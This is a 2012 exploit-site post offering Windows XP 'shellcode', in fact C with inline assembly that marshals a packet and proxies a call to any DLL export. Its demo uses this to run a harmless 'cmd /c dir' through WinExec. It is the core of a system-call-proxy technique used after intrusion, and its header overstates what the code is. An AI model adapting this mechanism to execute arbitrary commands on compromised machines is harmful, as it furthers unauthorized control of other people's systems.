windows xp sp2 [ arabic] mechanism shellcode 128 bytes+proxy=500bytes
来源:www.facebook.com/fysl.fyslm 作者:TrOoN 发布时间:2012-02-03  
# Title :windows xp sp2 [ arabic]  mechanism  shellcode 128 bytes+proxy=500bytes

# Author :TrOoN

# E-mail : SOUrRce-x@live.fr  |   www.facebook.com/fysl.fyslm

# Home : city 617 logts  : Draria . algeria

# Web Site : www.1337day.com       | 1337Day is ThE best pentest Security

# platform :  WinDows XP sp 2     AraBic    |

# platform i used in this shellcode : Back track 5  | windows xp arabIc sp2

# Type : local exploit /SHELL CODE  /ETc...

#Download link :http://www.microsoft.com

# 1337day sys : mechanism   is  remote system  [shellcode]

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|>

//  if you add proxy ; shellcode 128bytes +  proxy = 500bytes :p
// windows xp sp2 [ arabic]  remote system  mechanism
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
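//-----------------------------------------------------------------------
// int Marshall( flags, size, data, out, out_len )
//
// Appends one parameter record to a call packet. The record layout is
// the one AsmDemarshallAndCall() reads back:
//   out[0]     flags byte (IS_PTR / IS_IN / IS_OUT ...)
//   out[1..4]  size, as a native-endian unsigned
//   out[5..]   size bytes copied from data
//
// flags:   parameter flags byte
// size:    number of data bytes to copy
// data:    bytes to copy; may be NULL only when size == 0
// out:     destination cursor
// out_len: bytes available at out. The original accepted this value and
//          ignored it; a record that does not fit is now not written and
//          0 is returned so the caller's cursor does not move. The check
//          is only as good as out_len - pass the space remaining after
//          the cursor, not the whole buffer size.
// returns: bytes written (size + 5), or 0 if the record does not fit
//-----------------------------------------------------------------------
int Marshall( unsigned char flags, unsigned size, unsigned char *data,
unsigned char *out, unsigned out_len )
{
    // 5 == header size; written this way so size + 5 cannot wrap
    if ( out == NULL || out_len < 5 || size > out_len - 5 )
        return 0;
    out[0] = flags;
    // memcpy instead of the unaligned *(unsigned *) store: same bytes on
    // the wire, no alignment or strict-aliasing assumptions
    memcpy( &out[1], &size, sizeof( size ) );
    if ( size != 0 )
        memcpy( &out[5], data, size );
    return (int)( size + 5 );
}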
//////1337 Day shellcode///////////////
//////////////////////////////////////
// Parameter       //////////////////
////////////////////////////////////
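// Flags byte at the start of every marshalled parameter record
// (see Marshall()). Of these, AsmDemarshallAndCall() only tests
// IS_PTR and IS_IN; "out" is simply "pointer without IS_IN", and
// IS_SZ / IS_SZZ are never consulted.
// this thing is a pointer to a thing, rather than the thing itself
#define IS_PTR 0x01
// everything is either in, out or in | out
#define IS_IN 0x02
#define IS_OUT 0x04
// null terminated data
#define IS_SZ 0x08
// null short terminated data (e.g. unicode string)
#define IS_SZZ 0x10
////////////////////////////
// Function       //////////
////////////////////////////
// function is __cdecl (default is __stdcall)
// NOTE: this flag is stored by the demarshaller but never acted on.
#define FN_CDECL 0x01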
//-----------------------------------------------------------------------
// int AsmDemarshallAndCall( unsigned char *buff, void *loadlib, void *getproc )
//
// Walks a marshalled call packet and performs the call it describes.
//   buff     packet: "dllname\0" "fnname\0" num_params(4) out_param_size(4)
//            function_flags(4), then per parameter: flags(1) size(4) data(size)
//   loadlib  address of LoadLibraryA
//   getproc  address of GetProcAddress
// Returns 1 unconditionally; the called function's return value is dropped.
//
// What the code honours: the parameter count, and bits IS_PTR (1) and
// IS_IN (2) of each flags byte. out_param_size and function_flags are
// stored at ebp+12 / ebp+16 and never read again, so a __cdecl target
// (FN_CDECL) would leave its arguments on the stack and the fixed
// "add esp" at the end would not restore esp. Out buffers are carved
// from a 0x800-byte scratch area and are never copied back to the caller.
//
// Each parameter is pushed as it is met, so the packet must list them in
// push order - for __stdcall that is the last C argument first.
//
// Nothing in the packet is bounds-checked: the two string scans, the
// parameter count, every size field and the scratch area are all taken
// on trust, so a malformed packet reads and writes beyond buff.
//
// The three arguments are never referenced by name; they are fetched
// through hard-coded offsets (ebp+0x158 / 0x15c / 0x160) that reach back
// through the compiler-generated prologue. NOTE(review): those offsets
// are only right for the prologue the author's compiler emitted (they
// fit a 0x40-byte local area plus three saved registers) - confirm on
// any other compiler, build type or optimisation level.
// Clobbers eax, ebx, ecx, edx and flags; presumably relies on the
// compiler to save ebx around the inline block - confirm.
//-----------------------------------------------------------------------
int AsmDemarshallAndCall( unsigned char *buff, void *loadlib, void
*getproc )
{
// local frame (256 bytes, ebp-relative):
// ebp: dllname
// +4 : fnname
// +8 : num_params
// +12 : out_param_size
// +16 : function_flags
// +20 : params_so_far
// +24 : loadlibrary
// +28 : getprocaddress
// +32 : address of out data buffer
_asm
{
// set up params - this is a little complicated
// due to the fact we're calling a function with inline asm
// build our own frame below the compiler's one
push ebp
sub esp, 0x100
mov ebp, esp
// the three C arguments live above the compiler's frame; see header note
mov ebx, dword ptr[ebp+0x158]; // buff
mov dword ptr [ebp + 12], 0;
mov eax, dword ptr [ebp+0x15c];//loadlib
mov dword ptr[ebp + 24], eax;
mov eax, dword ptr [ebp+0x160];//getproc
mov dword ptr[ebp + 28], eax;
mov dword ptr [ebp], ebx; // ebx = dllname
// 0x800 bytes of stack for IS_OUT parameters; ebp+32 is the bump cursor
sub esp, 0x800; // give ourselves some data space
mov dword ptr[ebp + 32], esp;
jmp start;
// increment ebx until it points to a '0' byte
// local subroutine (reached with call, leaves with ret):
// ebx -> string in; ebx -> byte after its NUL out. clobbers al.
// no length limit - runs until it finds a zero byte.
skip_string:
mov al, byte ptr [ebx];
cmp al, 0;
jz done_string;
inc ebx;
jmp skip_string;
done_string:
inc ebx;
ret;
start:
// so skip the dll name
call skip_string;
// store function name
mov dword ptr[ ebp + 4 ], ebx
// skip the function name
call skip_string;
// store parameter count (edx is the live loop counter; ebp+8 is not read again)
mov ecx, dword ptr [ebx]
mov edx, ecx
mov dword ptr[ ebp + 8 ], ecx
// store out param size (never read again)
add ebx,4
mov ecx, dword ptr [ebx]
mov dword ptr[ ebp + 12 ], ecx
// store function flags (never read again - FN_CDECL is not honoured)
add ebx,4
mov ecx, dword ptr [ebx]
mov dword ptr[ ebp + 16 ], ecx
add ebx,4
// in this loop, edx holds the num parameters we have left to do.
// ebx walks the packet; each record is flags(1) size(4) data.
next_param:
cmp edx, 0
je call_proc
mov cl, byte ptr[ ebx ]; // cl = flags
inc ebx;
mov eax, dword ptr[ ebx ]; // eax = size
add ebx, 4;
// ch keeps a copy of the flags while cl is masked
mov ch,cl;
and cl, 1; // is it a pointer?
jz not_ptr;
mov cl,ch;
// is it an 'in' or 'inout' pointer?
and cl, 2;
jnz is_in;
// so it's an 'out'
// get current data pointer
mov ecx, dword ptr [ ebp + 32 ]
push ecx
// set our data pointer to end of data buffer
// (no check that the 0x800-byte area is not exhausted)
add dword ptr [ ebp + 32 ], eax
// the out record still occupies size bytes in the packet - skip them
add ebx, eax
dec edx
jmp next_param
is_in:
// pass a pointer straight into the packet; no copy is made
push ebx
// arg is 'in' or 'inout'
// this implies that the data is contained in the received packet
add ebx, eax
dec edx
jmp next_param
not_ptr:
// by-value parameter: the size field is ignored and exactly 4 bytes
// are read from the packet and pushed
mov eax, dword ptr[ ebx ];
push eax;
add ebx, 4
dec edx
jmp next_param;
 call_proc:

// args are now set up. let's call...
// hmodule = loadlib( dllname )  - __stdcall, pops its own argument
mov eax, dword ptr[ ebp ];
push eax;
mov eax, dword ptr[ ebp + 24 ];
call eax;
mov ebx, eax;
// fn = getproc( hmodule, fnname )
mov eax, dword ptr[ ebp + 4 ];
push eax;
push ebx;
mov eax, dword ptr[ ebp + 28 ];
call eax; // this is getprocaddress
// the parameters pushed in the loop are still on the stack underneath
call eax; // this is our function call
// now we tidy up
// assumes the target removed its own arguments (__stdcall); a __cdecl
// target leaves esp wrong here. the return value in eax is discarded.
add esp, 0x800;
add esp, 0x100;
pop ebp
}
return 1;
}
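//-----------------------------------------------------------------------
// Builds a marshalled call packet describing
//     kernel32!WinExec( "cmd /c dir > c:\\1337day.txt", 0 )
// and hands it to AsmDemarshallAndCall() together with the addresses of
// LoadLibraryA and GetProcAddress.
//
// Packet layout, in the order the demarshaller consumes it:
//   "kernel32.dll\0"  "WinExec\0"  param count (4)  out-param size (4)
//   fn flags (4)  then one Marshall() record per parameter.
// The demarshaller pushes each record as it meets it, so parameters are
// listed last-C-argument-first: uCmdShow first, lpCmdLine second.
//
// Returns 0 on success, 1 if kernel32 or its exports cannot be resolved
// or a record does not fit in buff. The string literals use plain ASCII
// quotes; the curly quotes in the original did not compile.
//-----------------------------------------------------------------------
int main( int argc, char *argv[] )
{
    unsigned char buff[ 256 ];
    unsigned char *psz = buff;
    unsigned field;                     // scratch for the 4-byte header fields
    DWORD show = 0;                     // WinExec uCmdShow argument
    HMODULE hk32;
    void *loadlib, *getproc;
    char *cmd = "cmd /c dir > c:\\1337day.txt";
    int n;

    (void)argc;
    (void)argv;

    // library name, then export name, both NUL terminated
    strcpy( (char *)psz, "kernel32.dll" );
    psz += strlen( (char *)psz ) + 1;
    strcpy( (char *)psz, "WinExec" );
    psz += strlen( (char *)psz ) + 1;

    // parameter count; memcpy instead of *(unsigned *) keeps the bytes the
    // demarshaller reads (native dword) without an unaligned store
    field = 2;
    memcpy( psz, &field, sizeof( field ) );
    psz += sizeof( field );

    // out-param size (stored by the demarshaller, never used)
    field = (unsigned)strlen( cmd ) + 1;
    memcpy( psz, &field, sizeof( field ) );
    psz += sizeof( field );

    // fn_flags: 0 = default calling convention (see FN_CDECL)
    field = 0;
    memcpy( psz, &field, sizeof( field ) );
    psz += sizeof( field );

    // uCmdShow, passed by value; out_len is the space left after the cursor
    n = Marshall( IS_IN, sizeof( DWORD ), (unsigned char *)&show,
                  psz, (unsigned)( sizeof( buff ) - ( psz - buff ) ) );
    if ( n == 0 )
        return 1;
    psz += n;

    // lpCmdLine, a pointer into the packet (IS_PTR | IS_IN), NUL included
    n = Marshall( IS_PTR | IS_IN, (unsigned)strlen( cmd ) + 1, (unsigned char *)cmd,
                  psz, (unsigned)( sizeof( buff ) - ( psz - buff ) ) );
    if ( n == 0 )
        return 1;
    psz += n;

    // the original never checked these; a NULL here would be called as code
    hk32 = LoadLibrary( "kernel32.dll" );
    if ( hk32 == NULL )
        return 1;
    loadlib = (void *)GetProcAddress( hk32, "LoadLibraryA" );
    getproc = (void *)GetProcAddress( hk32, "GetProcAddress" );
    if ( loadlib == NULL || getproc == NULL )
        return 1;

    AsmDemarshallAndCall( buff, loadlib, getproc );
    return 0;
}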

 ########################################### 1337day all  |  ######################################### 


 